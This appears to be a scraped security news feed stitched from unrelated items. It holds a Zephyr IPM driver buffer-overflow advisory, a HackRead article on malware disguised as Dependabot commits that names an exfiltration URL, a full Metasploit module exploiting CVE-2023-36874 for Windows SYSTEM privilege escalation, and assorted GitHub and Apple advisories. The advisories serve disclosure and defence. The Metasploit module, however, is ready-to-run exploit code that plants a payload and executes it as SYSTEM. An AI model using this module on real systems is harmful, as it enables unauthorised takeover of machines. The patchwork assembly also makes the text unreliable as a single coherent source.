 Two potential signed to unsigned conversion errors and buffer overflow vulnerabilities at the following locations in the Zephyr IPM drivers.


**Summary**

I spotted two signed to unsigned conversion errors and buffer overflow vulnerabilities at the following locations in the Zephyr IPM driver source code:  
https://github.com/zephyrproject-rtos/zephyr/blob/main/drivers/ipm/ipm\_imx.c  
https://github.com/zephyrproject-rtos/zephyr/blob/main/drivers/ipm/ipm\_mcux.c

**Details**

Buffer overflow if size is negative, due to signed/unsigned conversion in /drivers/ipm/ipm\_imx.c:

static int imx\_mu\_ipm\_send(const struct device \*dev, int wait, uint32\_t id,
			   const void \*data, int size)
{
	const struct imx\_mu\_config \*config \= dev\->config;
	MU\_Type \*base \= MU(config);
	uint32\_t data32\[IMX\_IPM\_DATA\_REGS\];
#if !IS\_ENABLED(CONFIG\_IPM\_IMX\_REV2)
	mu\_status\_t status;
#endif
	int i;

	if (id \> CONFIG\_IPM\_IMX\_MAX\_ID\_VAL) {
		return \-EINVAL;
	}

	if (size \> CONFIG\_IPM\_IMX\_MAX\_DATA\_SIZE) { /\* VULN: ineffective check if size is negative \*/
		return \-EMSGSIZE;
	}

	/\* Actual message is passing using 32 bits registers \*/
	memcpy(data32, data, size); /\* VULN: buffer overflow if size is negative \*/
...

Buffer overflow if size is negative, due to signed/unsigned conversion in /drivers/ipm/ipm\_mcux.c:

static int mcux\_mailbox\_ipm\_send(const struct device \*d, int wait,
				 uint32\_t id,
				 const void \*data, int size)
{
	const struct mcux\_mailbox\_config \*config \= d\->config;
	MAILBOX\_Type \*base \= config\->base;
	uint32\_t data32\[MCUX\_IPM\_DATA\_REGS\]; /\* Until we change API
					   \* to uint32\_t array
					   \*/
	unsigned int flags;
	int i;

	ARG\_UNUSED(wait);

	if (id \> MCUX\_IPM\_MAX\_ID\_VAL) {
		return \-EINVAL;
	}

	if (size \> MCUX\_IPM\_DATA\_REGS \* sizeof(uint32\_t)) { /\* VULN: ineffective check if size is negative \*/
		return \-EMSGSIZE;
	}

	flags \= irq\_lock();

	/\* Actual message is passing using 32 bits registers \*/
	memcpy(data32, data, size); /\* VULN: buffer overflow if size is negative \*/
...

**PoC**

I haven't tried to reproduce these potential vulnerabilities against a live install of the Zephyr OS.

**Impact**

If the inputs above are attacker-controlled and cross a security boundary, the impact of the unsigned conversion errors and buffer overflow vulnerabilities could range from denial of service to arbitrary code execution.

CVE-2023-5184: Signed to unsigned conversion errors and buffer overflow vulnerabilities in the Zephyr IPM driver

By Waqas
Malicious code disguised as Dependabot contributions hits hundreds of GitHub repositories.
This is a post from HackRead.com Read the original post: Malware Concealed as Dependabot Contributions Strikes GitHub Projects

According to the application security provider Checkmarx, cybercriminals concealed malicious code, masquerading as Dependabot, within GitHub repositories as part of a supply chain attack.

Cybersecurity experts have uncovered a series of malicious code injections camouflaged as legitimate Dependabot contributions across hundreds of GitHub repositories. These incidents, which occurred in July 2023, have raised concerns about the security of personal access tokens (PATs) on GitHub and the growing sophistication of threat actors in supply chain attacks.

****What is Dependabot in GitHub?****

Dependabot is a GitHub-native tool for automating dependency updates in software projects hosted on GitHub. It helps developers keep their projects up to date by automatically monitoring the project’s dependencies (such as libraries and packages) for security vulnerabilities and outdated versions.

When Dependabot detects that an update is available or a security vulnerability has been patched, it generates pull requests with the necessary updates. This simplifies the process of maintaining dependencies and ensures that projects stay secure and up to date with the latest software components.

****The Deceptive Attack****

During the first half of July, threat actors targeted a wide range of GitHub repositories, affecting both public and private projects. The victims primarily consisted of Indonesian user accounts, making it a significant and potentially widespread issue. The attackers utilized a clever technique to mimic Dependabot’s commit messages, deceiving developers into believing these were authentic contributions.

The falsified commit messages often bore the name “dependabot,” effectively camouflaging their activities and evading suspicion. Within these repositories, experts discovered two distinct groups of code alterations, strongly suggesting automated script usage by the attackers.

****Malicious Payload and Tactics****

According to a blog post from Guy Nachshon of Checkmarx, the attackers introduced a new GitHub Action file named “hook.yml” into the repositories, creating a new workflow that triggered during code pushes. This action siphoned GitHub secrets and variables, sending them to a suspicious URL, (sendwagateway.pro/webhook). This maneuver was executed with every push event, compounding the potential damage.

Additionally, the malicious actors tampered with existing project files bearing the “.js” extension. An obfuscated line of code was appended to these files, designed to create a new script tag upon execution in a browser environment. This new code aimed to load an external script from (sendwagatewaypro/client.js?cache=ignore), with the sinister purpose of intercepting web-based password forms and transmitting user credentials to the same exfiltration endpoint.

Screenshot of a malicious commit (Checkmarx)

****Uncovering the Attack Vector****

Initially, it remained unclear how the attackers gained access to the targeted accounts, given GitHub’s strengthened mandatory two-factor authentication (2FA) measures. To shed light on the situation, experts contacted some of the victims and discovered that the attackers had exploited compromised PATs (Personal Access Tokens).

These tokens, stored locally on developers’ machines, facilitate Git operations without requiring 2FA. Attackers seemingly extracted these tokens quietly from the victims’ development environments, potentially through a malicious open-source package that had infiltrated their systems.

****Automated Scale of the Attack****

Analyzing the scale of the attack indicated a high level of automation in the threat actor’s approach. The efficiency and sophistication of the attack underscored the need for increased vigilance among developers and software maintainers.

****Lessons Learned and Moving Forward****

This incident serves as a reminder of the importance of code source verification, even from trusted platforms like GitHub. It highlights that even well-established platforms can fall victim to such attacks, emphasizing the need for continuous online vigilance.

To enhance security, developers are urged to consider adopting GitHub’s fine-grained personal access tokens, reducing the risk associated with compromised tokens. However, it’s worth noting that access log activity for personal access tokens is currently visible only for enterprise accounts, leaving non-enterprise users less informed about potential breaches.

The attackers’ Tactics, Techniques, and Procedures (TTPs) demonstrate a growing sophistication in supply chain attacks. Their use of fake commits, credential theft, and Dependabot impersonation highlights the evolving threat landscape.

****RELATED ARTICLES****

1.  New backdoor malware hits Slack and Github platforms
2.  Hackers use GitHub bot to steal $1,200 in ETH within 100 seconds
3.  Hackers can spoof commit metadata to create false GitHub repositories

Malware Concealed as Dependabot Contributions Strikes GitHub Projects

This Metasploit module takes advantage of a bug in the way Windows error reporting opens the report parser. If you open a report, Windows uses a relative path to locate the rendering program. By creating a specific alternate directory structure, we can coerce Windows into opening an arbitrary executable as SYSTEM. If the current user is a local admin, the system will attempt impersonation and the exploit will fail.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Local  Rank = ExcellentRanking  include Msf::Post::Common  include Msf::Post::File  include Msf::Exploit::FileDropper  include Msf::Post::Windows::Priv  include Msf::Exploit::EXE  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Microsoft Error Reporting Local Privilege Elevation Vulnerability',        'Description' => %q{          This module takes advantage of a bug in the way Windows error reporting opens the report          parser.  If you open a report, Windows uses a relative path to locate the rendering program.          By creating a specific alternate directory structure, we can coerce Windows into opening an          arbitrary executable as SYSTEM.          If the current user is a local admin, the system will attempt impersonation and the exploit will          fail.        },        'License' => MSF_LICENSE,        'Author' => [          'Filip Dragović (Wh04m1001)', # PoC          'Octoberfest7', # PoC          'bwatters-r7' # msf module        ],        'Platform' => ['win'],        'SessionTypes' => [ 'meterpreter', 'shell', 'powershell' ],        'Targets' => [          [ 'Automatic', { 'Arch' => [ ARCH_X64 ] } ]        ],        'DefaultTarget' => 0,        'DisclosureDate' => '2023-07-11',        'References' => [          ['CVE', '2023-36874'],          ['URL', 'https://www.crowdstrike.com/blog/falcon-complete-zero-day-exploit-cve-2023-36874/'],          ['URL', 'https://github.com/Wh04m1001/CVE-2023-36874'],          ['URL', 'https://github.com/Octoberfest7/CVE-2023-36874_BOF']        ],        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [ ARTIFACTS_ON_DISK ]        },        'Compat' => {          'Meterpreter' => {            'Commands' => %w[              stdapi_fs_delete_file              stdapi_sys_config_getenv            ]          }        }      )    )    register_options([      OptString.new('EXPLOIT_NAME',                    [true, 'The filename to use for the exploit binary (%RAND%.exe by default).', "#{Rex::Text.rand_text_alpha(6..14)}.exe"]),      OptString.new('REPORT_DIR',                    [true, 'The Error Directory to use (%RAND% by default).', Rex::Text.rand_text_alpha(6..14).to_s]),      OptString.new('SHADOW_DRIVE',                    [true, 'Directory to place in the home drive for pivot (%TEMP% by default).', Rex::Text.rand_text_alpha(6..14).to_s]),      OptInt.new('EXECUTE_DELAY',                 [true, 'The number of seconds to delay between file upload and exploit launch', 3])    ])  end  # When we pass the directory value to the mkdir method, the mkdir method  # passes the reference to the string containing the directory.  # We do a lot of string manipulation in this module, so this is a quick  # hack to make sure that despite what we do with the string after we create  # the directory, it is  the actual directory we created that gets sent to  # the cleanup methods.  def clone_mkdir(dir)    mkdir(dir.clone)  end  def upload_error_report    wer_archive_dir = get_env('PROGRAMDATA')    vprint_status(wer_archive_dir)    wer_archive_dir << '\\Microsoft\\Windows\\WER\\ReportArchive'    report_dir = "#{wer_archive_dir}\\#{datastore['REPORT_DIR']}"    report_filename = "#{report_dir}\\Report.wer"    vprint_status("Creating #{report_dir}")    clone_mkdir(report_dir)    wer_report_data = exploit_data('CVE-2023-36874', 'Report.wer')    vprint_status("Writing Report to #{report_filename}")    write_file(report_filename, wer_report_data)  end  def build_shadow_archive_dir(shadow_base_dir)    wer_archive_dir = shadow_base_dir    clone_mkdir(wer_archive_dir)    wer_archive_dir << '\\ProgramData\\'    clone_mkdir(wer_archive_dir)    wer_archive_dir << 'Microsoft\\'    clone_mkdir(wer_archive_dir)    wer_archive_dir << 'Windows\\'    clone_mkdir(wer_archive_dir)    wer_archive_dir << 'WER\\'    clone_mkdir(wer_archive_dir)    wer_archive_dir << 'ReportArchive\\'    clone_mkdir(wer_archive_dir)    report_dir = "#{wer_archive_dir}#{datastore['REPORT_DIR']}"    clone_mkdir(report_dir)    return report_dir  end  def upload_shadow_report(shadow_archive_dir)    report_filename = "#{shadow_archive_dir}\\Report.wer"    wer_report_data = exploit_data('CVE-2023-36874', 'Report.wer')    vprint_status("Writing bad Report to #{report_filename}")    write_file(report_filename, wer_report_data)  end  def build_shadow_system32(shadow_base_dir)    shadow_win32 = "#{shadow_base_dir}\\system32"    vprint_status("Creating #{shadow_win32}")    clone_mkdir(shadow_win32)    return shadow_win32  end  def upload_payload(shadow_win32)    payload_bin = generate_payload_exe    payload_filename = "#{shadow_win32}\\wermgr.exe"    vprint_status("Writing payload to #{payload_filename}")    write_file(payload_filename, payload_bin)  end  def upload_execute_exploit(exploit_path, shadow_path, home_dir)    vprint_status("shadow_path = #{shadow_path}")    exploit_bin = exploit_data('CVE-2023-36874', 'CVE-2023-36874.exe')    write_file(exploit_path, exploit_bin)    sleep datastore['EXECUTE_DELAY']    vprint_status("Exploit uploaded to #{exploit_path}")    cmd = "#{exploit_path} #{shadow_path} #{home_dir} #{datastore['REPORT_DIR']}"    output = cmd_exec(cmd, nil, 30)    vprint_status(output)  end  def check    # This only appears to work on 22H2, but likely will work elsewhere if we figure out the function pointers.    version = get_version_info    vprint_status("OS version: #{version}")    return Exploit::CheckCode::Appears if version.build_number == Msf::WindowsVersion::Win10_22H2    return Exploit::CheckCode::Safe  end  def exploit    fail_with(Module::Failure::BadConfig, 'User cannot be local admin') if is_in_admin_group?    fail_with(Module::Failure::BadConfig, 'Already SYSTEM') if is_system?    shadow_dir = datastore['SHADOW_DRIVE']    home_dir = get_env('HOMEDRIVE')    shadow_path = "#{home_dir}\\#{shadow_dir}"    vprint_status("Shadow Path = #{shadow_path}")    upload_error_report    shadow_archive_dir = build_shadow_archive_dir(shadow_path.dup)    upload_shadow_report(shadow_archive_dir)    shadow_system32 = build_shadow_system32(shadow_path.dup)    upload_payload(shadow_system32)    sleep datastore['EXECUTE_DELAY']    exploit_path = "#{shadow_path}\\#{datastore['EXPLOIT_NAME']}"    exploit_path << '.exe' unless exploit_path[-4..] == '.exe'    if shadow_dir.length > 64      fail_with(Module::Failure::BadConfig, 'REPORT_DIR value too long')    end    upload_execute_exploit(exploit_path, shadow_dir, home_dir)    print_warning("Manual deletion of #{shadow_path} may be required")  endend

Microsoft Error Reporting Local Privilege Elevation

Introspection is enabled on `demo.pimcore.fun`. The demo site has graphql as a feature for users, but allows users to run instropection queries, which presents a potential schema information disclosure vulnerability.

**Pimcore Demo Allows GraphQL Introspection**

Moderate severity GitHub Reviewed Published Sep 27, 2023 to the GitHub Advisory Database • Updated Sep 27, 2023

GHSA-p76j-h4m8-hx5c: Pimcore Demo Allows GraphQL Introspection

A Cross-site scripting (XSS) vulnerability in /panel/configuration/financial/ of Subrion v4.2.1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into several fields: 'Minimum deposit', 'Maximum deposit' and/or 'Maximum balance'.

**Subrion CMS XSS in /panel/configuration/financial/**

Moderate severity GitHub Reviewed Published Sep 27, 2023 to the GitHub Advisory Database • Updated Sep 27, 2023

GHSA-q832-2275-rfqh: Subrion CMS XSS in /panel/configuration/financial/

A Cross-site scripting (XSS) vulnerability in /panel/languages/ of Subrion v4.2.1 allow attackers to execute arbitrary web scripts or HTML via a crafted payload injected into 'Title' parameter.

**Subrion CMS Cross-site Scripting vulnerability in /panel/languages**

Moderate severity GitHub Reviewed Published Sep 27, 2023 to the GitHub Advisory Database • Updated Sep 29, 2023

GHSA-4w2j-wj9q-6wpx: Subrion CMS Cross-site Scripting vulnerability in /panel/languages

A flaw was found in undertow. Servlets annotated with @MultipartConfig may cause an OutOfMemoryError due to large multipart content. This may allow unauthorized users to cause remote Denial of Service (DoS) attack. If the server uses fileSizeThreshold to limit the file size, it's possible to bypass the limit by setting the file name in the request to null.

**Undertow vulnerable to denial of service**

High severity GitHub Reviewed Published Sep 27, 2023 to the GitHub Advisory Database • Updated Sep 27, 2023

GHSA-65h2-wf7m-q2v8: Undertow vulnerable to denial of service

Path Traversal in OpenCart versions 4.0.0.0 to 4.0.2.2 allows an authenticated user with access/modify privilege on the Log component to empty out arbitrary files on the server

**OpenCart Path Traversal vulnerability**

High severity GitHub Reviewed Published Sep 27, 2023 to the GitHub Advisory Database • Updated Sep 27, 2023

GHSA-v4j2-cwmm-xg89: OpenCart Path Traversal vulnerability

A permissions issue was addressed with improved redaction of sensitive information. This issue is fixed in tvOS 17, iOS 17 and iPadOS 17, macOS Sonoma 14. An app may be able to read sensitive location information.

CVE-2023-40384: About the security content of iOS 17 and iPadOS 17

The issue was addressed with improved checks. This issue is fixed in macOS Ventura 13.6. Apps that fail verification checks may still launch.

Released September 21, 2023

**Apple Neural Engine**

Available for: macOS Ventura

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2023-40412: Mohamed GHANNAM (@\_simo36)

CVE-2023-40409: Ye Zhang (@VAR10CK) of Baidu Security

Entry added September 26, 2023

**Apple Neural Engine**

Available for: macOS Ventura

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: A use-after-free issue was addressed with improved memory management.

CVE-2023-41071: Mohamed GHANNAM (@\_simo36)

Entry added September 26, 2023

**Apple Neural Engine**

Available for: macOS Ventura

Impact: An app may be able to disclose kernel memory

Description: An out-of-bounds read was addressed with improved input validation.

CVE-2023-40410: Tim Michaud (@TimGMichaud) of Moveworks.ai

Entry added September 26, 2023

**Biometric Authentication**

Available for: macOS Ventura

Impact: An app may be able to disclose kernel memory

Description: An out-of-bounds read was addressed with improved bounds checking.

CVE-2023-41232: Liang Wei of PixiePoint Security

Entry added September 26, 2023

**ColorSync**

Available for: macOS Ventura

Impact: An app may be able to read arbitrary files

Description: The issue was addressed with improved checks.

CVE-2023-40406: JeongOhKyea of Theori

Entry added September 26, 2023

**CoreAnimation**

Available for: macOS Ventura

Impact: Processing web content may lead to a denial-of-service

Description: The issue was addressed with improved memory handling.

CVE-2023-40420: 이준성(Junsung Lee) of Cross Republic

Entry added September 26, 2023

**Kernel**

Available for: macOS Ventura

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2023-41984: Pan ZhenPeng (@Peterpan0927) of STAR Labs SG Pte. Ltd.

Entry added September 26, 2023

**Kernel**

Available for: macOS Ventura

Impact: An attacker that has already achieved kernel code execution may be able to bypass kernel memory mitigations

Description: The issue was addressed with improved memory handling.

CVE-2023-41981: Linus Henze of Pinauten GmbH (pinauten.de)

Entry added September 26, 2023

**Kernel**

Available for: macOS Ventura

Impact: A local attacker may be able to elevate their privileges. Apple is aware of a report that this issue may have been actively exploited against versions of iOS before iOS 16.7.

Description: The issue was addressed with improved checks.

CVE-2023-41992: Bill Marczak of The Citizen Lab at The University of Toronto's Munk School and Maddie Stone of Google's Threat Analysis Group

**libxpc**

Available for: macOS Ventura

Impact: An app may be able to access protected user data

Description: An authorization issue was addressed with improved state management.

CVE-2023-41073: Zhipeng Huo (@R3dF09) of Tencent Security Xuanwu Lab (xlab.tencent.com)

Entry added September 26, 2023

**libxpc**

Available for: macOS Ventura

Impact: An app may be able to delete files for which it does not have permission

Description: A permissions issue was addressed with additional restrictions.

CVE-2023-40454: Zhipeng Huo (@R3dF09) of Tencent Security Xuanwu Lab (xlab.tencent.com)

Entry added September 26, 2023

**libxslt**

Available for: macOS Ventura

Impact: Processing web content may disclose sensitive information

Description: The issue was addressed with improved memory handling.

CVE-2023-40403: Dohyun Lee (@l33d0hyun) of PK Security

Entry added September 26, 2023

**Maps**

Available for: macOS Ventura

Impact: An app may be able to read sensitive location information

Description: The issue was addressed with improved handling of caches.

CVE-2023-40427: Adam M., and Wojciech Regula of SecuRing (wojciechregula.blog)

Entry added September 26, 2023

**Pro Res**

Available for: macOS Ventura

Impact: An app may be able to execute arbitrary code with kernel privileges

Description: The issue was addressed with improved memory handling.

CVE-2023-41063: Certik Skyfall Team

Entry added September 26, 2023

**Sandbox**

Available for: macOS Ventura

Impact: An app may be able to overwrite arbitrary files

Description: The issue was addressed with improved bounds checks.

CVE-2023-40452: Yiğit Can YILMAZ (@yilmazcanyigit)

Entry added September 26, 2023

**Sandbox**

Available for: macOS Ventura

Impact: Apps that fail verification checks may still launch

Description: The issue was addressed with improved checks.

CVE-2023-41996: Yiğit Can YILMAZ (@yilmazcanyigit) and Mickey Jin (@patch1t)

Entry added September 26, 2023

**Security**

Available for: macOS Ventura

Impact: A malicious app may be able to bypass signature validation. Apple is aware of a report that this issue may have been actively exploited against versions of iOS before iOS 16.7.

Description: A certificate validation issue was addressed.

CVE-2023-41991: Bill Marczak of The Citizen Lab at The University of Toronto's Munk School and Maddie Stone of Google's Threat Analysis Group

**Share Sheet**

Available for: macOS Ventura

Impact: An app may be able to access sensitive data logged when a user shares a link

Description: A logic issue was addressed with improved checks.

CVE-2023-41070: Kirin (@Pwnrin)

Entry added September 26, 2023

**StorageKit**

Available for: macOS Ventura

Impact: An app may be able to read arbitrary files

Description: This issue was addressed with improved validation of symlinks.

CVE-2023-41968: Mickey Jin (@patch1t), James Hutchins

Entry added September 26, 2023

Tag

#git